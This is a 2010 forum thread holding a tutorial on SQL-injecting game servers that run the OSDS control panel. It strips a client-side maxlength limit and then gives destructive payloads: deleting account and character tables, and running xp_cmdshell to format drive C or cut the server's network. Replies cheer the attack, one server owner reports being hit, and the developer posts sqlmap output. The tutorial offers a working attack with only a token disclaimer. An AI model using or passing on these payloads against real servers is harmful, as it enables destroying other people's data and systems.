[Tutorial]How to SQL inject into a server with OSDS

Page 1 of 2 1 2
02/04/2010 13:57 Zombe#1
This is a nice trick how to bypass janvier's anti-sql-injection, that he put into OSDS in just a few steps.

First, get [Only registered and activated users can see links. Click Here To Register...].
Find a server that has an OSDS control panel and go to the panel login page.
Now, janvier's anti-sql-injection comes in. You can't write more then 12 letters, so you can't inject anything decent...
So here's what we do. Press Ctrl+U to open up the source code and press Ctrl+F to open up search in the sourcecode. Search for "maxlength" (without the quotes). You will come to something like
HTML Code:
maxlength='12'
So delete that parameter.
Not the whole input, just the maxlength parameter, so the line
HTML Code:
<input type='text' name='accname' maxlength='12' />
should look like
HTML Code:
<input type='text' name='accname' />
Then, press "Apply Changes" at the top, and close the sourcecode tab.
Hooray! We can write as long as we want ^^

And from now on, we inject the same way as we would normally.
Note: After the page is refreshed, you have to remove maxlength again.

After you inject, you should see a screen like this:

A few good injections:
Code:
a' DELETE FROM character..user_character--
(Deletes all characters)
Code:
a' DELETE FROM account..Tbl_user DELETE FROM character..USER_PROFILE--
(Deletes all accounts)

And for the more drastic ones:
Code:
a' exec master..xp_cmdshell 'ipconfig /release'--
(Disconnects the internet from the server)
Code:
a' exec master..xp_cmdshell 'format "C:/"'--
(Formats drive C)

Janvier, I hope your CMS is protected a little better... Haven't tried it on CMS yet.

IMPORTANT:
SQL injections are illegal, and if you do so, you do so on your own free will, knowing that legal action may be taken.
This tutorial's maker does not take any blame for the damage this may have caused. If users are to use this, they do so on their own will. This tutorial was made for teaching purposes only. User discretion is advised.
02/04/2010 14:01 draegon71#2
Thank you Zombe for your awesome tutorial.You deserve much more than a big Thanks.
Remember, this is illegal so dont abuse too much ...
Vote for sticky.
[x]Ruin every thread made by janvier123
02/04/2010 14:09 Zombe#3
Quote:
Originally Posted by draegon71 View Post
[x]Ruin every thread made by janvier123
Well, that goal is just a joke, but honestly, it made me laugh now :D
02/04/2010 14:11 pieter#4
thanks for not using the format thing yet zombe!

removing osds now ;)
02/04/2010 14:12 Zombe#5
Quote:
Originally Posted by pieter View Post
thanks for not using the format thing yet zombe!

removing osds now ;)
Lol, sry for ur server. I was just testing, didn't really think janvier's protection was so weak, I was 95% sure it won't work... Sorry for ur server, RLY sorry... :(
If anything, I can DEV for u a while to help you get your players back.

I'll also make a tutorial on how to prevent SQL injections. But I have to think of a decent way myself first.
02/04/2010 14:15 pieter#6
Im running it on leeched files, it wouldnt be honest to ask u to dev on other person's files :)

oh and i backup all databases every 30 minutes, because i didnt trust the 1click

its a fun server nothing big or commercial lol, still thanks for the advertising lol ;)
02/04/2010 14:34 Zombe#7
Quote:
Originally Posted by pieter View Post
Im running it on leeched files, it wouldnt be honest to ask u to dev on other person's files :)

oh and i backup all databases every 30 minutes, because i didnt trust the 1click

its a fun server nothing big or commercial lol, still thanks for the advertising lol ;)
****, didn't think about advertising... Forgot to blur the link >_>
Ill do that in a little while.
02/04/2010 14:49 pieter#8
awww. and i was about to hit report on you _O-

nah its back up, disabled osds and registration for the time being (had the same bug)
02/04/2010 15:54 janvier123#9
i hate you know zombe :)
02/04/2010 16:04 Zombe#10
Quote:
Originally Posted by janvier123 View Post
i hate you know zombe :)
Just add some protection, like preparing queries, etc ^^
You should thank me for pointing out ur mistake ;)
02/04/2010 23:58 EliteWarrior#11
Well good job to Zombe,but i already knew it was vulrnable to sql injection try to perfect out youre script janvier123 this is the mainreason im not using it.
02/05/2010 00:56 ҉ THT ҉#12
This mean; OSDS = DIE
Thanks to zombie xD LOL
02/05/2010 07:58 Zombe#13
Tested and works on CMS ^^
02/05/2010 10:23 janvier123#14
Analysing URL [/dkcms/V0.1/?dkcms=main]

[+] working on dkcms
[+] Method: MS-SQL error message
[+] Method: SQL error message
[+] Method: MySQL comment injection
[+] Method: SQL Blind Statement Injection
[+] Method: SQL Blind String Injection
--- No results here means that SQLiX found no injection point ---


--- Now sqlmap will test your url ---

[*] starting at: 09:21:09

[09:21:09] [INFO] testing connection to the target url
[09:21:10] [INFO] testing if the url is stable, wait a few seconds
[09:21:14] [INFO] url is stable
[09:21:14] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
[09:21:15] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
[09:21:15] [INFO] testing if Cookie parameter 'PHPSESSID' is dynamic
[09:21:16] [WARNING] Cookie parameter 'PHPSESSID' is not dynamic
[09:21:16] [INFO] testing if GET parameter 'dkcms' is dynamic
[09:21:18] [INFO] confirming that GET parameter 'dkcms' is dynamic
[09:21:20] [INFO] GET parameter 'dkcms' is dynamic
[09:21:20] [INFO] testing sql injection on GET parameter 'dkcms' with 0 parenthesis
[09:21:20] [INFO] testing unescaped numeric injection on GET parameter 'dkcms'
[09:21:21] [INFO] GET parameter 'dkcms' is not unescaped numeric injectable
[09:21:21] [INFO] testing single quoted string injection on GET parameter 'dkcms'
[09:21:22] [INFO] GET parameter 'dkcms' is not single quoted string injectable
[09:21:22] [INFO] testing LIKE single quoted string injection on GET parameter 'dkcms'
[09:21:24] [INFO] GET parameter 'dkcms' is not LIKE single quoted string injectable
[09:21:24] [INFO] testing double quoted string injection on GET parameter 'dkcms'
[09:21:25] [INFO] GET parameter 'dkcms' is not double quoted string injectable
[09:21:25] [INFO] testing LIKE double quoted string injection on GET parameter 'dkcms'
[09:21:26] [INFO] GET parameter 'dkcms' is not LIKE double quoted string injectable
[09:21:26] [INFO] GET parameter 'dkcms' is not injectable with 0 parenthesis
[09:21:26] [INFO] testing sql injection on GET parameter 'dkcms' with 1 parenthesis
[09:21:26] [INFO] testing unescaped numeric injection on GET parameter 'dkcms'
[09:21:27] [INFO] GET parameter 'dkcms' is not unescaped numeric injectable
[09:21:27] [INFO] testing single quoted string injection on GET parameter 'dkcms'
[09:21:29] [INFO] GET parameter 'dkcms' is not single quoted string injectable
[09:21:29] [INFO] testing LIKE single quoted string injection on GET parameter 'dkcms'
[09:21:30] [INFO] GET parameter 'dkcms' is not LIKE single quoted string injectable
[09:21:30] [INFO] testing double quoted string injection on GET parameter 'dkcms'
[09:21:31] [INFO] GET parameter 'dkcms' is not double quoted string injectable
[09:21:31] [INFO] testing LIKE double quoted string injection on GET parameter 'dkcms'
[09:21:32] [INFO] GET parameter 'dkcms' is not LIKE double quoted string injectable
[09:21:32] [INFO] GET parameter 'dkcms' is not injectable with 1 parenthesis
[09:21:32] [INFO] testing sql injection on GET parameter 'dkcms' with 2 parenthesis
[09:21:32] [INFO] testing unescaped numeric injection on GET parameter 'dkcms'
[09:21:34] [INFO] GET parameter 'dkcms' is not unescaped numeric injectable
[09:21:34] [INFO] testing single quoted string injection on GET parameter 'dkcms'
[09:21:35] [INFO] GET parameter 'dkcms' is not single quoted string injectable
[09:21:35] [INFO] testing LIKE single quoted string injection on GET parameter 'dkcms'
[09:21:36] [INFO] GET parameter 'dkcms' is not LIKE single quoted string injectable
[09:21:36] [INFO] testing double quoted string injection on GET parameter 'dkcms'
[09:21:37] [INFO] GET parameter 'dkcms' is not double quoted string injectable
[09:21:37] [INFO] testing LIKE double quoted string injection on GET parameter 'dkcms'
[09:21:38] [INFO] GET parameter 'dkcms' is not LIKE double quoted string injectable
[09:21:38] [INFO] GET parameter 'dkcms' is not injectable with 2 parenthesis
[09:21:38] [INFO] testing sql injection on GET parameter 'dkcms' with 3 parenthesis
[09:21:38] [INFO] testing unescaped numeric injection on GET parameter 'dkcms'
[09:21:40] [INFO] GET parameter 'dkcms' is not unescaped numeric injectable
[09:21:40] [INFO] testing single quoted string injection on GET parameter 'dkcms'
[09:21:41] [INFO] GET parameter 'dkcms' is not single quoted string injectable
[09:21:41] [INFO] testing LIKE single quoted string injection on GET parameter 'dkcms'
[09:21:42] [INFO] GET parameter 'dkcms' is not LIKE single quoted string injectable
[09:21:42] [INFO] testing double quoted string injection on GET parameter 'dkcms'
[09:21:43] [INFO] GET parameter 'dkcms' is not double quoted string injectable
[09:21:43] [INFO] testing LIKE double quoted string injection on GET parameter 'dkcms'
[09:21:45] [INFO] GET parameter 'dkcms' is not LIKE double quoted string injectable
[09:21:45] [INFO] GET parameter 'dkcms' is not injectable with 3 parenthesis
[09:21:45] [WARNING] GET parameter 'dkcms' is not injectable


To bad zombe, :)
02/05/2010 12:30 draegon71#15
yep is working at dkcms too ... FAIL
I Tested at my server ^^
Page 1 of 2 1 2